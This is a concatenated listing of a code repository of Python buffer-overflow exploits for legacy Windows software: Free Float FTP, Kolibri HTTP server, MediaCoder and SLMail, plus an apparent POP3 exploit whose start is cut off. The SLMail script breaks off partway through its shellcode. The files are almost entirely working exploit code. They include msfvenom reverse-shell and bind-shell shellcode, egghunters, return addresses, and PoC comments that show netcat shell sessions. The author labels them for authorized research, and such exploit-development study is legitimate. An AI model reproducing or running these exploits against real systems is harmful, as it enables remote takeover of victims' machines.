"\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 72 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 73 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 74 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 75 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 76 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 77 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 78 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 79 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 80 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 81 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 82 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 83 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 84 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 85 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 86 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 87 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 88 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 89 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 90 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 91 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 92 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 93 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 94 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 95 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 96 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 97 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 98 | shellcode += 
"\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 99 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 100 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 101 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 102 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 103 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 104 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 105 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 106 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 107 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 108 | shellcode += "\x45\x41\x41" 109 | 110 | buff = "\x41"*713 + "\x27\xb2\xfa\x77" + "\x90"*100 + egghunter + "r4f4r4f4" + shellcode 111 | 112 | sploit = "-ERR " + buff 113 | 114 | try: 115 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 116 | s.bind(('', 110)) 117 | s.listen(1) 118 | print ("[*] Listening on port 110.") 119 | print ("[*] Have someone connect to you.") 120 | print ("[*] Type -c to exit.") 121 | conn, addr = s.accept() 122 | print '[*] Received connection from: ', addr 123 | 124 | while 1: 125 | conn.send(sploit) 126 | conn.close() 127 | except: 128 | print ("[*] Done.") 129 | -------------------------------------------------------------------------------- /exploit-freefloatftp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Free Float FTP - 'MKD' Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox. 9 | # - Download and install vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # http://www.exploit-db.com/wp-content/themes/exploit/applications/687ef6f72dcbbf5b2506e80a375377fa-freefloatftpserver.zip 11 | # - Just run the binary and the service will be running 12 | # - pattern_create.rb and pattern_offset.rb = 247 13 | # - Badchars = \x00\x0a\x0d 14 | # - Return Address found at 0x7ca58265 (JMP ESP) | SHELL32.dll 15 | # - Generated the payload using msfvenom 16 | # 17 | # PoC: 18 | # terminal 1 19 | # root@kali: python exploit-freefloatftp.py 20 | # terminal 2 21 | # root@kali:~# nc -nlvp 443 22 | # listening on [any] 443 ... 23 | # connect to [10.0.0.36] from (UNKNOWN) [10.0.0.44] 1047 24 | # Microsoft Windows XP [versão 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\Joe\Meus documentos> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
31 | # 32 | # 33 | 34 | import socket 35 | import sys 36 | 37 | eip = "\x65\x82\xa5\x7c" 38 | nops = "\x90"*20 39 | 40 | # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" 41 | #Payload size: 351 bytes 42 | 43 | shellcode = ("\xd9\xc1\xd9\x74\x24\xf4\x5a\xbe\x6a\x9f\x74\x89\x29\xc9\xb1" 44 | "\x52\x83\xea\xfc\x31\x72\x13\x03\x18\x8c\x96\x7c\x20\x5a\xd4" 45 | "\x7f\xd8\x9b\xb9\xf6\x3d\xaa\xf9\x6d\x36\x9d\xc9\xe6\x1a\x12" 46 | "\xa1\xab\x8e\xa1\xc7\x63\xa1\x02\x6d\x52\x8c\x93\xde\xa6\x8f" 47 | "\x17\x1d\xfb\x6f\x29\xee\x0e\x6e\x6e\x13\xe2\x22\x27\x5f\x51" 48 | "\xd2\x4c\x15\x6a\x59\x1e\xbb\xea\xbe\xd7\xba\xdb\x11\x63\xe5" 49 | "\xfb\x90\xa0\x9d\xb5\x8a\xa5\x98\x0c\x21\x1d\x56\x8f\xe3\x6f" 50 | "\x97\x3c\xca\x5f\x6a\x3c\x0b\x67\x95\x4b\x65\x9b\x28\x4c\xb2" 51 | "\xe1\xf6\xd9\x20\x41\x7c\x79\x8c\x73\x51\x1c\x47\x7f\x1e\x6a" 52 | "\x0f\x9c\xa1\xbf\x24\x98\x2a\x3e\xea\x28\x68\x65\x2e\x70\x2a" 53 | "\x04\x77\xdc\x9d\x39\x67\xbf\x42\x9c\xec\x52\x96\xad\xaf\x3a" 54 | "\x5b\x9c\x4f\xbb\xf3\x97\x3c\x89\x5c\x0c\xaa\xa1\x15\x8a\x2d" 55 | "\xc5\x0f\x6a\xa1\x38\xb0\x8b\xe8\xfe\xe4\xdb\x82\xd7\x84\xb7" 56 | "\x52\xd7\x50\x17\x02\x77\x0b\xd8\xf2\x37\xfb\xb0\x18\xb8\x24" 57 | "\xa0\x23\x12\x4d\x4b\xde\xf5\x78\x8c\xe0\x21\x15\x8e\xe0\x28" 58 | "\x5e\x07\x06\x40\xb0\x4e\x91\xfd\x29\xcb\x69\x9f\xb6\xc1\x14" 59 | "\x9f\x3d\xe6\xe9\x6e\xb6\x83\xf9\x07\x36\xde\xa3\x8e\x49\xf4" 60 | "\xcb\x4d\xdb\x93\x0b\x1b\xc0\x0b\x5c\x4c\x36\x42\x08\x60\x61" 61 | "\xfc\x2e\x79\xf7\xc7\xea\xa6\xc4\xc6\xf3\x2b\x70\xed\xe3\xf5" 62 | "\x79\xa9\x57\xaa\x2f\x67\x01\x0c\x86\xc9\xfb\xc6\x75\x80\x6b" 63 | "\x9e\xb5\x13\xed\x9f\x93\xe5\x11\x11\x4a\xb0\x2e\x9e\x1a\x34" 64 | "\x57\xc2\xba\xbb\x82\x46\xca\xf1\x8e\xef\x43\x5c\x5b\xb2\x09" 65 | "\x5f\xb6\xf1\x37\xdc\x32\x8a\xc3\xfc\x37\x8f\x88\xba\xa4\xfd" 66 | "\x81\x2e\xca\x52\xa1\x7a") 67 | 68 | buffer = "A"*247 + eip + nops + shellcode + "C"*(1000-247-4-20-351) 69 | 70 | 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 71 | connect=s.connect(('10.0.0.44',21)) 72 | 73 | s.recv(1024) 74 | s.send('USER anonymous\r\n') 75 | s.recv(1024) 76 | s.send('PASS anonymous\r\n') 77 | s.recv(1024) 78 | s.send('MKD ' + buffer + '\r\n') 79 | s.recv(1024) 80 | s.send('QUIT\r\n') 81 | s.close 82 | -------------------------------------------------------------------------------- /exploit-kolibri.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Kolibri v2.0 HTTP Server (Using Egghunter) 6 | # 7 | # Thanks to FuzzySecurity for this great reference: 8 | # http://www.fuzzysecurity.com/tutorials/expDev/4.html 9 | # 10 | # How I tested it: 11 | # - Windows XP SP3 and Kali. 12 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 13 | # - https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip 14 | # 15 | # Development Proccess: 16 | # - https://medium.com/@rafaveira3/exploit-development-kolibri-v2-0-http-server-egg-hunter-example-1-5e435aa84879 17 | # 18 | # PoC: 19 | # Windows XP: 20 | # - Open Kolibri and press "Start" to start listening on port 8080 21 | # - Open cmd and type "netstat -ano | find ":4444" 22 | # Kali: 23 | # root@kali:~# python exploit-kolibri.py 24 | # root@kali:~# 25 | # root@kali:~# nc -nv 10.10.0.20 4444 26 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 27 | # Microsoft Windows XP [Version 5.1.2600] 28 | # (C) Copyright 1985-2001 Microsoft Corp. 29 | # 30 | # C:\Documents and Settings\rafael\Desktop\WORK\kolibri2> 31 | # 32 | # 33 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 34 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
35 | # 36 | # INFOS: 37 | # - pattern_create.rb + pattern_offset.rb = 515 38 | # - Return Address found at 0x71A91C8B (JMP ESP) | wshtcpip.dll 39 | # - short jmp 50 bytes back opcode: \xEB\xCE 40 | # - generated egghunter using mona scripts (Egg = r4f4) 41 | # - Generated shellcode using msfvenom 42 | 43 | import socket 44 | import os 45 | import sys 46 | 47 | # 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34 48 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 49 | 50 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 51 | # Size = 718 bytes 52 | shellcode = "" 53 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 54 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 55 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 56 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 57 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 58 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 59 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 60 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 61 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 62 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 63 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 64 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 65 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 66 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 67 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 68 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 69 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 70 | shellcode += 
"\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 71 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 72 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 73 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 74 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 75 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 76 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 77 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 78 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 79 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 80 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 81 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 82 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 83 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 84 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 85 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 86 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 87 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 88 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 89 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 90 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 91 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 92 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 93 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 94 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 95 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 96 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 97 | shellcode += 
"\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 98 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 99 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 100 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 101 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 102 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 103 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 104 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 105 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 106 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 107 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 108 | shellcode += "\x45\x41\x41" 109 | 110 | Stage1 = "A"*478 + egghunter + "A"*5 + "\x8B\x1C\xA9\x71" + "\xEB\xCE" 111 | Stage2 = "r4f4r4f4" + shellcode 112 | 113 | buffer = ( 114 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 115 | "Host: 10.10.0.20:8080\r\n" 116 | "User-Agent: " + Stage2 + "\r\n" 117 | "Keep-Alive: 115\r\n" 118 | "Connection: keep-alive\r\n\r\n") 119 | 120 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 121 | expl.connect(("10.10.0.20", 8080)) 122 | expl.send(buffer) 123 | expl.close() 124 | -------------------------------------------------------------------------------- /exploit-mediacoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! 
THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/88879396a7103d9a401d05f5cec9bcae-MediaCoder-0.8.48.5888.exe 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Install MediaCoder 0.8.48.5888 (next -> next -> finish) 15 | # C:\Python27>python.exe exploit-mediacoder.py 16 | # Exploit has been created! 17 | # C:\Python27> 18 | # - Open cmd.exe and type : netstat -ano | find ":4444" 19 | # - Right click exploit.m3u -> Open With... MediaCoder 20 | # Kali: 21 | # root@kali:~# nc -nv 10.10.0.20 4444 22 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 23 | # Microsoft Windows XP [Version 5.1.2600] 24 | # (C) Copyright 1985-2001 Microsoft Corp. 25 | # 26 | # C:\Program Files\MediaCoder> 27 | # 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # Infos: 33 | # - pattern_create + pattern_offset= = 365 34 | # - pop pop ret found using mona at 0x64f010b2 of swscale-3.dll (SafeSEH:False) 35 | # - short jmp 54 bytes back opcode: \xEB\xCA 36 | # - egghunter generated with mona (egg r4f4) 37 | # - shellcode generated with msfvenom 38 | 39 | from struct import pack 40 | 41 | jmp = "\xEB\xCA" 42 | 43 | # Size 32 Bytes 44 | # Egg = r4f4 45 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 46 | 47 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 48 | # Size = 718 bytes 49 | shellcode = "" 50 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 51 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 52 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 53 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 54 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 55 
| shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 56 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 57 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 58 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 59 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 60 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 61 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 62 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 63 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 64 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 65 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 66 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 67 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 68 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 69 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 70 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 71 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 72 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 73 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 74 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 75 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 76 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 77 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 78 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 79 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 80 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 81 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 82 | shellcode += 
"\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 83 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 84 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 85 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 86 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 87 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 88 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 89 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 90 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 91 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 92 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 93 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 94 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 95 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 96 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 97 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 98 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 99 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 100 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 101 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 102 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 103 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 104 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 105 | shellcode += "\x45\x41\x41" 106 | 107 | # buf = junk + nSEH + SEH + junk 108 | junk = "http://" + "A"*309 + "\x90"*10 + egghunter + "\x90"*10 + "B"*2 + jmp + "\xb2\x10\xf0\x64" + "r4f4r4f4" + shellcode 109 | 110 | exploit = junk 111 | 112 | try: 113 | file= open("exploit.m3u",'w') 114 | file.write(exploit) 115 | file.close() 
116 | raw_input("\nExploit has been created!\n") 117 | except: 118 | print "There has been an Error" 119 | -------------------------------------------------------------------------------- /exploit-slmail.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Exploit SLMail - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe 11 | # - Intallation Guide: Next, Next, Next, ... , Next, Finish 12 | # - pattern_create.rb and pattern_offset.rb = 2606 13 | # - Bachars = \x00\x0a\x0d 14 | # - Return Address found at 5F4A358F (JMP ESP) 15 | # - Generated the payload using msfvenom 16 | # 17 | # PoC: 18 | # terminal 1 19 | # root@kali: python exploit-smail.py 20 | # terminal 2 21 | # root@kali: nc -nlvp 443 22 | # listening on [any] 443 ... 23 | # connect to [10.10.0.20] from (UNKNOWN) [10.10.0.21] 1035 24 | # Microsoft Windows XP [vers�o 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Arquivos de programas\SLmail\System> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 
31 | # 32 | # 33 | 34 | import socket 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | 37 | jmpESP = "\x8f\x35\x4a\x5f" 38 | nop = "\x90"*16 39 | 40 | # 41 | # msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.0.20 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" 42 | # Payload size: 351 bytes 43 | 44 | shellcode = ("\xbf\xbc\xfc\x4b\xdd\xdb\xd5\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 45 | "\x52\x31\x7a\x12\x03\x7a\x12\x83\x7e\xf8\xa9\x28\x82\xe9\xac" 46 | "\xd3\x7a\xea\xd0\x5a\x9f\xdb\xd0\x39\xd4\x4c\xe1\x4a\xb8\x60" 47 | "\x8a\x1f\x28\xf2\xfe\xb7\x5f\xb3\xb5\xe1\x6e\x44\xe5\xd2\xf1" 48 | "\xc6\xf4\x06\xd1\xf7\x36\x5b\x10\x3f\x2a\x96\x40\xe8\x20\x05" 49 | "\x74\x9d\x7d\x96\xff\xed\x90\x9e\x1c\xa5\x93\x8f\xb3\xbd\xcd" 50 | "\x0f\x32\x11\x66\x06\x2c\x76\x43\xd0\xc7\x4c\x3f\xe3\x01\x9d" 51 | "\xc0\x48\x6c\x11\x33\x90\xa9\x96\xac\xe7\xc3\xe4\x51\xf0\x10" 52 | 